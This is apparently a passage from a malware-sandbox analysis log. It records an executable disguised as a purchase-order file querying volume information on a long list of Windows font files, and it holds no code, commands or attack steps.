                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\COOPBL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\FTLTLT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\HARNGTON.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\HTOWERT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\LBRITE.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\LBRITED.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\LCALLIG.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\LFAX.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\LFAXD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\LFAXI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\LFAXDI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\MATURASC.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\MOD20.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\NIAGENG.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\OLDENGL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\ONYX.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\PARCHM.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\POORICH.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\RAVIE.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\INFROMAN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\SHOWG.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\SNAP____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\STENCIL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\VINERITC.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\VIVALDII.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\LATINWD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\TCM_____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\TCMI____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\TCB_____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\TCBI____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\TCCM____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\TCCB____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\TCCEB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe | Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF | VolumeInformation
